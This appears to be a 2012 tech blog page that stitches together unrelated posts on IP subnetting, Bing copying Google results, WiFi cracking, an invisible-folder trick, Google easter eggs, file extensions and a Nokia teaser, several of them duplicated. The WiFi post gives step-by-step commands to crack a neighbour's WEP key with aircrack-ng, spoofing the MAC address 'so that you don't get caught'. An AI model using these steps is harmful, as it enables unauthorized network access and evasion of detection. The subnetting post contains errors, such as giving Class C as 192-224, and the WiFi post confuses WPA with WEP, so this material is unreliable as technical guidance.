
Tuesday, 31 July 2012

IP Subnetting-The Easy Way

Is network subnetting driving you crazy ? Does binary math gives you headaches ? well..fear not, since the time i have delved into networks, i have gone through all the oohs and aaahs and the NAH’s of the logical crescendo , and I present you the easiest way to do subnetting. Generally,3 questions are being addressed when subnetting an IP-IP subnetting made easy - prohack
  1. No of subnets
  2. No of valid hosts and
  3. Host range/block size
We will tackle them one by one. First you need to know about IP addresses and their classes.
Class A includes 0-127 where 0 and 127 are reserved, the default subnet mask for this class is /8 .
Class B includes 128-191 in their first octet, and the default subnet mask for this class is /16
Class C deals with 192-224 in their first octet and the default subnet mask for this class is /24
Also, also, understand a simple concept, subnet masks lying between 8- 15 are A class masks, from 16- 23 are B class and 24-32 are C class masks. Furthermore, a subnet mask can be expressed as this where (N)etwork value and (H)ost values-
Class mask value          8        16        24        32
Now once you see it, lets tackle some real life questions. Lets find the no of subnets and valid hosts for192.168.10.10/18
See this ? its a C class IP address having a mask of B class (as the mask lies between 16-24) now, in order to find the number of subnets, use the following formulae - 
2 ^ (What mask you have been provided – default mask of the IP address given)
putting the values here..
2^(18-16) –>  2^(2) –>  4 subnets
simple : )
Now for calculating the no.of hosts, use the below formulae -
2^(32- what mask you have been provided) –2
Putting values here..
2^(32-18)-2 -> 2^(14)-2 –> 16384-2 –> 16382 hosts
piece of cake ..
now to find the block size, see the provided mask lies between which next default mask value , which in this case is 24 (as 18 is greater than 16 and less than 24) . So ..
Subtract the provided mask with the class mask value which is greater than it.
2^(Next class mask value – provided mask)
which on putting values will be
2^(24-18) –> 2^6 –> 64
So, the block size will be of 64 . So, the IP addresses will be divided into 4 subnets (which we already calculated above) above as - - – - –
And the best part, its applicable to all classes : 

Bing Copies Google Results

In an amazing post by Danny Sullivan , which details how Bing watches what people search on Google, Bing copies Google resultscopies it & uses  the information to improve its own results. Of courseMicrosoft denies it.. but what was novel was the spy hunt by Google to caught Bing red handed. It all started with “tarosorraphy”  which is a medical term for a rare surgical procedure on eyes, which was Googled in the summer of 2010 & was quirky enough to get Google’s attention. They corrected it , but what was peculiar was that Bing displayed the first correct result of Google without even a correction of spelling. As the official Google blog states - 
Google returned the correct spelling—tarsorrhaphy—along with results for the corrected query. At that time, Bing had no results for the misspelling. Later in the summer, Bing started returning our first result to their users without offering the spell correction (see screenshots below). This was very strange. How could they return our first result to their users without the correct spelling? Had they known the correct spelling, they could have returned several more relevant results for the corrected query.

Hack WiFi Using Backtrack

Hacking Wifi using Backtrack -

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..
Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
  • ifconfig
This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
  • airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
  • airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
  • macchanger –mac [Desired MAC address] [Wi-Fi card name]
this command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
  • airmon-ng start [Wi-Fi Card name]
You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
  • airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
  • airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension]  Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.


Simple Hacking For Make invisible Folder without hiding.

Photo: Simple Hacking For Make invisible Folder without hiding.
step to create this type of folders
1.make new folder
2.Rename it - press and hold ALT key and type 0160
using this u can make folder without name 
3.then right click on this folder and goto properties---> Customize----> 
Change Icon -----> select blank icon ---> press ok ----> ok 
Using this steps u can make invisible folder without hiding folder.

step to create this type of folders
1.make new folder
2.Rename it - press and hold ALT key and type 0160
using this u can make folder without name
3.then right click on this folder and goto properties---> Customize---->
Change Icon -----> select blank icon ---> press ok ----> ok
Using this steps u can make invisible folder without hiding folder.

Tricks In Google

Photo: Hai here i have given twelve exciting things in google for you and also made a tutorial of the below awesome tricks in google. Video Link

0.‘Askew’ Your Google Search Results

Do a search on Google for askew

Feeling a little tipsy?

1. Tilt!

If you’re using Google on either Chrome or Safari, go ahead and Google the word “tilt”, and the entire screen tilts a bit to the right!

2. Do A Barrel Roll

It’s simple and works just like Tilt- go and Google the phrase “do a barrel roll” and watch what happens!

3.Let Me Google That For You

Don’t you absolutely hate when someone asks you “hey, what’s (so-obvious-thing)” when they could just Google it and immediately know what you’re talking about? LMGTFY is a site that allows you to be a total smartass. Just type in the search object for them, then hand them the tinyurl link. They’ll feel silly and you’ll feel awesome!

4.Google Doodles

This page here is a history of all the sites’ Google Doodles- not just American versions, but those the site hosts all around the world.

5.Google Gravity

This is perhaps the coolest Google trick of all, so cool that I won’t even ruin the surprise for you. Go ahead and try it here, and don’t be afraid to search. You can even move things around!

6.Google Sphere

This will make your google image search page look like a sphere.

7.Slay The Dragon

In Google Docs, open any spreadsheet and if you press Shift+F12, a message will pop up announcing “Dragon slain! Congratulations, you’ve slain the dragon!”

8.Google Pacman

Loved the Google Pacman doodle and want to play with that logo again? No fear!

9.Epic Google

Open, Type Epic Google in the search box and click on I’m feeling Lucky button. Each component on the page will start growing bigger and bigger.

10. Google Hacker

Open, Type Google Hacker in the search box and click on I’m feeling Lucky button. How google will look if it was made by a hacker.

11.Annoying Google

Open, Type Annoying Google in the search box and click on I’m feeling Lucky button.

12.Chuck Norris

Open, Type Find Chuck Norris in the search box and click on I’m feeling Lucky button. Google won’t search for Chuck Norris because it knows you don’t find Chuck Norris, he finds you.Remaining Tricks will be coming in my next post.

Enjoy the Tricks,Enjoy the Life.

Hai here i have given twelve exciting things in google for you and also made a tutorial of the below awesome tricks in google. Video Link

0.‘Askew’ Your Google Search Results

Do a search on Google for askew

Feeling a little tipsy?

1. Tilt!

If you’re using Google on either Chrome or Safari, go ahead and Google the word “tilt”, and the entire screen tilts a bit to the right!

2. Do A Barrel Roll

It’s simple and works just like Tilt- go and Google the phrase “do a barrel roll” and watch what happens!

3.Let Me Google That For You

Don’t you absolutely hate when someone asks you “hey, what’s (so-obvious-thing)” when they could just Google it and immediately know what you’re talking about? LMGTFY is a site that allows you to be a total smartass. Just type in the search object for them, then hand them the tinyurl link. They’ll feel silly and you’ll feel awesome!

4.Google Doodles

This page here is a history of all the sites’ Google Doodles- not just American versions, but those the site hosts all around the world.

5.Google Gravity

This is perhaps the coolest Google trick of all, so cool that I won’t even ruin the surprise for you. Go ahead and try it here, and don’t be afraid to search. You can even move things around!

6.Google Sphere

This will make your google image search page look like a sphere.

7.Slay The Dragon

In Google Docs, open any spreadsheet and if you press Shift+F12, a message will pop up announcing “Dragon slain! Congratulations, you’ve slain the dragon!”

8.Google Pacman

Loved the Google Pacman doodle and want to play with that logo again? No fear!

9.Epic Google

Open, Type Epic Google in the search box and click on I’m feeling Lucky button. Each component on the page will start growing bigger and bigger.

10. Google Hacker

Open, Type Google Hacker in the search box and click on I’m feeling Lucky button. How google will look if it was made by a hacker.

11.Annoying Google

Open, Type Annoying Google in the search box and click on I’m feeling Lucky button.

12.Chuck Norris

Open, Type Find Chuck Norris in the search box and click on I’m feeling Lucky button. Google won’t search for Chuck Norris because it knows you don’t find Chuck Norris, he finds you.Remaining Tricks will be coming in my next post.

Enjoy the Tricks,Enjoy the Life.

All Computer File Format in the World : W

Photo: All Computer File Format in the World : W

Hi here after you dont need to ask Google or Bing,”What file format is this .aif”, because in our posts you will learn about all the Computers file formats that available in the world.

If you found anything new on this then please comment us, we are very happy to know if there is any more computer file format available.

WAD     Large file for Doom game containing video, player level, and other information
WAV     Windows Waveform sound
WB1     QuattroPro for Windows spreadsheet
WB2     QuattroPro for Windows spreadsheet
WBK     Microsoft Word Backup
WBL     Argo WebLoad II upload file
WCM     WordPerfect Macro
WDB     Microsoft Works database
WEB     CorelXara Web document
WGP     Wild Board Games data file
WID     Ventura width table
WIL     WinImage file
WIZ     Microsoft Word Wizard
WK1     Lotus 123 versions 1 & 2 spreadsheet
WK3     Lotus 123 version 3 spreadsheet
WK4     Lotus 123 version 4 spreadsheet
WKS     Lotus 123 Worksheet spreadsheet
WKS     Microsoft Works document
WLF     Argo WebLoad I upload file
WLL     Microsoft Word Add-In
WMF     Windows Metafile
WOW     Grave Composer music module (MOD) file
WP     WordPerfect document
WPW     Novel PerfectWorks document
WP4     WordPerfect 4 document
WP5     WordPerfect 5 document
WP6     WordPerfect 6 document
WPD     WordPerfect Demo
WPD     WordPerfect Document
WPG     WordPerfect Graphic
WPS     Microsoft Works document
WPT     WordPerfect Template
WQ1     QuattroPro/DOS spreadsheet
WQ2     QuattroPro/DOS version 5 spreadsheet
WRI     Write document
WRL     Virtual Reality model
WS1     WordStar for Windows 1 document
WS2     WordStar for Windows 2 document
WS3     WordStar for Windows 3 document
WS4     WordStar for Windows 4 document
WS5     WordStar for Windows 5 document
WS6     WordStar for Windows 6 document
WS7     WordStar for Windows 7 document
WSD     WordStar 2000 document
WVL     Wavelet Compressed Bitmap.

Have Fun.

Hi here after you dont need to ask Google or Bing,”What file format is this .aif”, because in our posts you will learn about all the Computers file formats that available in the world.

If you found anything new on this then please comment us, we are very happy to know if there is any more computer file format available.

WAD Large file for Doom game containing video, player level, and other information
WAV Windows Waveform sound
WB1 QuattroPro for Windows spreadsheet
WB2 QuattroPro for Windows spreadsheet
WBK Microsoft Word Backup
WBL Argo WebLoad II upload file
WCM WordPerfect Macro
WDB Microsoft Works database
WEB CorelXara Web document
WGP Wild Board Games data file
WID Ventura width table
WIL WinImage file
WIZ Microsoft Word Wizard
WK1 Lotus 123 versions 1 & 2 spreadsheet
WK3 Lotus 123 version 3 spreadsheet
WK4 Lotus 123 version 4 spreadsheet
WKS Lotus 123 Worksheet spreadsheet
WKS Microsoft Works document
WLF Argo WebLoad I upload file
WLL Microsoft Word Add-In
WMF Windows Metafile
WOW Grave Composer music module (MOD) file
WP WordPerfect document
WPW Novel PerfectWorks document
WP4 WordPerfect 4 document
WP5 WordPerfect 5 document
WP6 WordPerfect 6 document
WPD WordPerfect Demo
WPD WordPerfect Document
WPG WordPerfect Graphic
WPS Microsoft Works document
WPT WordPerfect Template
WQ1 QuattroPro/DOS spreadsheet
WQ2 QuattroPro/DOS version 5 spreadsheet
WRI Write document
WRL Virtual Reality model
WS1 WordStar for Windows 1 document
WS2 WordStar for Windows 2 document
WS3 WordStar for Windows 3 document
WS4 WordStar for Windows 4 document
WS5 WordStar for Windows 5 document
WS6 WordStar for Windows 6 document
WS7 WordStar for Windows 7 document
WSD WordStar 2000 document
WVL Wavelet Compressed Bitmap.

Have Fun.

Nokia to amaze you on September 7

Photo: Nokia to amaze you on September 7 :

Nokia has creating a hype which building as days goes to reach september 7. For the Forthcoming Nokia World Event nokia has placed massive banners outside Nokia Store in Helsinki.It is announced in the banner “something amazing is coming” on September 7.
Its already known that the Nokia world event is scheduled to held in the same city Helsinki on September 5 and 6.

So Everybody with full of hype created are eagerly waiting for the date.Nokia teaser has triggered every people
with all sorts of speculations on the web.

The teaser speculates that any product may be unveiled at the event.It may announce a new Windows 8 Phone on the first day
of the event and make it available to all on at last.

Wait till september 7

Nokia has creating a hype which building as days goes to reach september 7. For the Forthcoming Nokia World Event nokia has placed massive banners outside Nokia Store in Helsinki.It is announced in the banner “something amazing is coming” on September 7.
Its already known that the Nokia world event is scheduled to held in the same city Helsinki on September 5 and 6.

So Everybody with full of hype created are eagerly waiting for the date.Nokia teaser has triggered every people
with all sorts of speculations on the web.

The teaser speculates that any product may be unveiled at the event.It may announce a new Windows 8 Phone on the first day
of the event and make it available to all on at last.

Wait till september 7